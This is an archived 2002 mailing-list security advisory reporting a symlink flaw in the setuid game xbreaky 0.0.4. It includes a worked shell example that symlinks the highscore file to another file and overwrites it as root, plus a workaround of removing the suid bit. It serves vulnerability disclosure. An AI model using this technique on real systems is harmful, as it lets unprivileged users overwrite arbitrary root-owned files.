lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <3D7E38E4.9CCDB6DC@obit.nl>
From: m.v.berkum at obit.nl (Marco van Berkum)
Subject: xbreaky symlink vulnerability

-----------------------------------------------------------------------
Title:             xbreaky 0.0.4 symlink vulnerability
Author:            Marco van Berkum
Classification:    High risk
Date:              10/09/2002
Email:             m.v.berkum@...t.nl
Company:           OBIT
Company site:      http://www.obit.nl
Personal website:  http://ws.obit.nl
-----------------------------------------------------------------------

About xbreaky
-------------
xbreaky is a breakout game for X written by Dave Brul which can be downloaded
from http://xbreaky.sourceforge.net. xbreaky is added to the OpenBSD ports tree,
NetBSD tree and possibly others.

Problem
-------
By default xbreaky is installed as suid and can be abused to overwrite any file
on the filesystem, by any user.

Exploit
-------
xbreaky uses $HOME/.breakyhighscores to write the highscores to, when
$HOME/.breakyhighscores is symlinked to another file (*any* file) it simply
overwrites it as root user.

Example
-------
root@...mal:/home/marco# echo "bla" >rootfile
root@...mal:/home/marco# chmod 600 rootfile
root@...mal:/home/marco# exit
logout
marco@...mal:~$ ln -s rootfile .breakyhighscores
marco@...mal:~$ xbreaky

Now I play a game and set highscore as user "lol", then I exit the game.
Its a nice game btw :)

marco@...mal:~$ cat rootfile
cat: rootfile: Permission denied
marco@...mal:~$ su -
Password:
root@...mal:~# cat /home/marco/rootfile
lol <- voila, our highscore user

Workaround
----------
Remove suidbit.

Author
------
The author has been notified.

Credits
-------
Thanks to Dennis Oelkers for testing.

--
find / -user your -name base -exec chown us:us {}\;
 ----------------------------------------
|    Marco van Berkum / MB17300-RIPE     |
| m.v.berkum@...t.nl / http://ws.obit.nl |
 ----------------------------------------




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ